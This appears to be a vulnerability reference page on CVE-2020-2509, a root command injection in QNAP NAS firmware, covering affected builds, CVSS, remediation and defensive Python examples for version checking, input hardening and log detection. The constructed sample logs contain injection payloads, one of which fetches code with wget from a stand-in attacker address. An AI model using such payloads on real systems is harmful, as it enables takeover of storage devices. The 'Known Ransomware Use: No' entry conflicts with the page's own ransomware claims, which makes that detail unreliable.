What is QNAP NAS?
QNAP (Quality Network Appliance Provider) produces Network-Attached Storage devices widely used in homes, small businesses, and enterprises for file storage, backup, and media serving. QNAP NAS devices run QTS (QNAP Turbo Station) or QuTS hero as their operating system and expose a web management interface, by default on port 8080 (HTTP) and port 443 (HTTPS). Because a NAS typically holds both critical business data and the backups of that data, it is an extremely high-value ransomware target: encrypting the NAS can destroy primary files and their backups at once. Command injection vulnerabilities in QNAP's management interfaces made QNAP NAS devices among the most heavily targeted consumer and SMB storage devices for ransomware and botnet operators through 2020–2023.
Overview
CVE-2020-2509 is a command injection vulnerability (CWE-77) in QNAP's QTS and QuTS hero NAS operating systems that allows a remote, unauthenticated attacker to execute operating system commands as root. The flaw lies in the NAS management interface: user-supplied parameters are not adequately sanitized, so shell metacharacters escape the application context and run arbitrary commands on the underlying Linux system. QNAP published advisory QSA-21-05 in April 2021. CISA added the CVE to the Known Exploited Vulnerabilities (KEV) catalog on 2022-04-11, reflecting ongoing exploitation by ransomware and botnet operators against internet-exposed QNAP devices.
Affected Versions
| Product | Vulnerable | Fixed |
|---|---|---|
| QNAP QTS 4.5.2 (builds before 4.5.2.1566 Build 20210202) | Yes | 4.5.2.1566 Build 20210202 and later |
| QNAP QTS 4.3.6 and other older QTS branches | Yes | Latest update for that branch (fixed builds are listed per branch in QSA-21-05) |
| QNAP QuTS hero h4.5.1 (builds before h4.5.1.1491 Build 20201119) | Yes | h4.5.1.1491 Build 20201119 and later |
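The table above is easy to misread on a device that is on a different QTS branch, so here is a small check, added as an example and not QNAP tooling, that parses a firmware version string as shown in Control Panel and compares it to the fixed builds listed on this page. The version-string format (`4.5.2.1566 Build 20210202`, with an `h` prefix for QuTS hero) is assumed from the advisory's wording; branches for which this page gives no fixed build return `None` rather than a guess, and branches newer than the newest fixed branch are assumed to carry the fix.

```python
"""Compare a QNAP QTS / QuTS hero version string against the CVE-2020-2509
fixed builds listed in the Affected Versions table.

Added example; not QNAP code. The version-string format is an assumption
based on how QNAP writes versions in its advisories.
"""
import re
from typing import NamedTuple, Optional

# (product, branch) -> (build number, build date) as given on this page.
# Branches without a published fixed build here (e.g. QTS 4.3.6) are
# deliberately absent so the check reports "unknown" for them.
FIXED_BUILDS = {
    ("QTS", (4, 5, 2)): (1566, 20210202),
    ("QuTS hero", (4, 5, 1)): (1491, 20201119),
}

VERSION_RE = re.compile(
    r"^(?P<hero>h)?(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)\.(?P<build>\d+)"
    r"\s+Build\s+(?P<date>\d{8})$"
)


class QnapVersion(NamedTuple):
    product: str   # "QTS" or "QuTS hero"
    branch: tuple  # (major, minor, patch), e.g. (4, 5, 2)
    build: int     # e.g. 1566
    date: int      # e.g. 20210202 (YYYYMMDD, so integer order is date order)


def parse_version(s: str) -> QnapVersion:
    m = VERSION_RE.match(s.strip())
    if m is None:
        raise ValueError(f"unrecognised QNAP version string: {s!r}")
    product = "QuTS hero" if m.group("hero") else "QTS"
    branch = (int(m.group("major")), int(m.group("minor")), int(m.group("patch")))
    return QnapVersion(product, branch, int(m.group("build")), int(m.group("date")))


def is_fixed(s: str) -> Optional[bool]:
    """True if at or above the fixed build for its branch, False if below,
    None if this page lists no fixed build for the branch (check QSA-21-05)."""
    v = parse_version(s)
    fixed = FIXED_BUILDS.get((v.product, v.branch))
    if fixed is not None:
        return (v.build, v.date) >= fixed
    # Assumption: branches newer than the newest fixed branch of the same
    # product were released after the fix and therefore contain it.
    newest = max(branch for (product, branch) in FIXED_BUILDS if product == v.product)
    if v.branch > newest:
        return True
    return None


if __name__ == "__main__":
    for sample in ("4.5.2.1566 Build 20210202", "4.5.2.1500 Build 20210101",
                   "h4.5.1.1491 Build 20201119", "4.3.6.1600 Build 20210101"):
        print(sample, "->", is_fixed(sample))
```

A `None` result is the important case: it means the device is on a branch this page does not cover, and the right move is to read the per-branch fixed build in QSA-21-05 rather than assume it is patched.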
Technical Details
- Root cause: command injection (CWE-77) in the QNAP NAS web management interface. User-supplied input to management CGI scripts or API endpoints is passed to underlying shell commands without adequate sanitization, so shell metacharacters (`;`, `|`, `` ` ``, `$()`) injected into a parameter cause the NAS's embedded Linux shell to execute attacker-controlled commands.
- Root execution context: QNAP's management web server and system management processes run as root, so code execution through this injection is immediately root-level, with full access to all stored data, configuration, and system functions.
- No authentication required: the PR:N component of the CVSS vector indicates that the vulnerable endpoint is reachable without credentials; any QNAP device whose web management interface is reachable from the internet can be exploited without a valid account.
- Mass exploitation context: QNAP NAS devices are frequently internet-exposed (often on non-standard ports) for remote file access, and Shodan regularly indexes hundreds of thousands of exposed QNAP devices; ransomware campaigns such as Qlocker and IoT botnets such as Muhstik have systematically targeted QNAP command injection vulnerabilities
- Data destruction risk: NAS ransomware attacks typically encrypt all stored data and delete on-device snapshots; because many organizations use the NAS as their backup target, a successful QNAP ransomware attack can destroy primary data and its backups at the same time
Discovery
Discovered and reported to QNAP; patched in QTS and QuTS hero updates released in early 2021 and documented in QSA-21-05 (April 2021). CISA's April 2022 KEV addition reflects sustained active exploitation by ransomware operators and IoT botnet operators targeting QNAP NAS devices.
Exploitation Context
QNAP NAS devices have been targeted by multiple ransomware campaigns: Qlocker (encrypts files into password-protected 7z archives), eCh0raix/QNAPCrypt, DeadBolt, and others. Internet-exposed QNAP devices are regularly mass-scanned and exploited within hours of public vulnerability disclosure. The widespread practice of using NAS devices for backup storage makes QNAP ransomware attacks particularly destructive — destroying backups simultaneously with primary data. Organizations that directly expose NAS management interfaces to the internet (or use UPnP to automatically open firewall ports) are at highest risk.
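To make the Technical Details concrete and give the mass-scanning picture above something to act on, here is an added example in Python; it is not QNAP's CGI code (which is not public), and the `/cgi-bin/example.cgi` path, the `host` parameter and the access-log lines are constructed for illustration, not the real vulnerable endpoint. It shows the vulnerable pattern (a request parameter spliced into a shell command line), what `/bin/sh` makes of the injected value, the hardened form (allowlist plus argv with no shell), and a detection pass over combined-format access logs that percent-decodes query values before looking for metacharacters. The `shlex` tokenization approximates sh word splitting; it is not a full shell parser.

```python
"""Command injection via a CGI parameter: vulnerable form, hardened form,
and a detection pass over web-server access logs.

Added example, not QNAP code. Endpoint, parameter name and log lines are
constructed for illustration.
"""
import re
import shlex
import subprocess
from urllib.parse import parse_qsl, urlsplit


# Vulnerable pattern: the request parameter is spliced into a command line
# that is handed to /bin/sh (the C equivalent is system("ping -c 1 " + p)).
def build_command_vulnerable(host: str) -> str:
    return f"ping -c 1 {host}"


# What /bin/sh would make of that line. With punctuation_chars=True the
# lexer emits ; | & ( ) < > as their own tokens, so an injected ';' shows
# up as a command separator rather than as part of the host argument.
def shell_tokens(cmdline: str) -> list:
    return list(shlex.shlex(cmdline, posix=True, punctuation_chars=True))


# Hardened pattern: allowlist the value (hostname characters only; a
# leading '-' is rejected too, so the value cannot become a ping option),
# then pass argv directly to the kernel with no shell in between.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def is_safe_hostname(value: str) -> bool:
    return HOSTNAME_RE.match(value) is not None


def build_command_safe(host: str) -> list:
    if not is_safe_hostname(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


def run_safe(host: str) -> int:
    # shell=False: metacharacters stay inert even if validation were wrong.
    return subprocess.run(build_command_safe(host), check=False).returncode


# Detection: flag requests whose query values contain shell metacharacters
# once percent-decoded (so %3B is caught as ';' and %24%28 as '$(').
META_RE = re.compile(r"[;&|`$()<>\r\n]")
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_requests(log_lines) -> list:
    """Return (client, parameter, decoded value) for each request whose
    query string carries a shell metacharacter in a parameter value."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if META_RE.search(value):
                hits.append((m.group("client"), key, value))
                break
    return hits


# Constructed access-log lines (combined log format). Addresses are from
# the documentation ranges and the CGI path is fictitious.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Apr/2021:03:14:07 +0000] "GET /cgi-bin/example.cgi?host=nas01.local HTTP/1.1" 200 312',
    '198.51.100.23 - - [20/Apr/2021:03:14:09 +0000] "GET /cgi-bin/example.cgi?host=127.0.0.1%3Bid HTTP/1.1" 200 410',
    '198.51.100.23 - - [20/Apr/2021:03:14:11 +0000] "GET /cgi-bin/example.cgi?host=x%60wget+http://198.51.100.23/x%60 HTTP/1.1" 200 410',
    '203.0.113.9 - - [20/Apr/2021:03:15:00 +0000] "POST /cgi-bin/example.cgi?host=%24%28id%29 HTTP/1.1" 500 0',
]


if __name__ == "__main__":
    print(shell_tokens(build_command_vulnerable("127.0.0.1; id")))
    for hit in suspicious_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

Two design points carry over to real triage. First, the fix is argv plus an allowlist, not escaping: `shlex.quote` would neutralize the metacharacters, but a value that reaches a shell at all is a value that a later refactor can re-expose. Second, the detector decodes before matching; scanners routinely percent-encode `;`, backticks and `$()`, and a rule that greps the raw request line for `;` misses `%3B`.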
Remediation
- Update QNAP QTS to 4.5.2.1566 Build 20210202 or later and QuTS hero to h4.5.1.1491 Build 20201119 or later (devices on other QTS branches should take the fixed build listed for that branch in QSA-21-05), via Control Panel > System > Firmware Update or by installing the firmware image from QNAP's download center
- Immediately remove internet-facing access to QNAP management interfaces: delete port forwarding rules and UPnP port mappings that expose port 443, 8080, or 8081 to the internet, and disable UPnP on the router so the NAS cannot re-open them
- Reach the NAS remotely only through a VPN (for example QNAP's QVPN Service or a VPN terminated on the perimeter firewall) rather than exposing the management interface directly
- Run QNAP Security Counselor and Malware Remover to flag weak settings and known malware, and review the system and access logs for logins or requests you do not recognize
- Enable two-step verification on QNAP user accounts; this hardens credential-based access but does not block CVE-2020-2509 itself, which requires no credentials
- Verify that backups of critical NAS data exist on offline, air-gapped, or immutable media, since NAS ransomware can reach any backup the compromised NAS can write to
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2020-2509 |
| Vendor / Product | QNAP — QNAP Network-Attached Storage (NAS) |
| NVD Published | 2021-04-17 |
| NVD Last Modified | 2025-10-27 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-77 (Improper Neutralization of Special Elements used in a Command) |
| CISA KEV Added | 2022-04-11 |
| CISA KEV Deadline | 2022-05-02 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
| Metric | Value |
|---|---|
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | None |
| User Interaction (UI) | None |
| Scope (S) | Unchanged |
| Confidentiality (C) | High |
| Integrity (I) | High |
| Availability (A) | High |
Required Action
Apply updates per vendor instructions (CISA BOD 22-01 required action for this KEV entry; federal agencies were due by 2022-05-02).
Timeline
| Date | Event |
|---|---|
| 2021-04-17 | CVE published; QNAP releases QSA-21-05 advisory |
| 2022-04-11 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-05-02 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| QNAP Security Advisory QSA-21-05 | Vendor Advisory |
| NVD — CVE-2020-2509 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |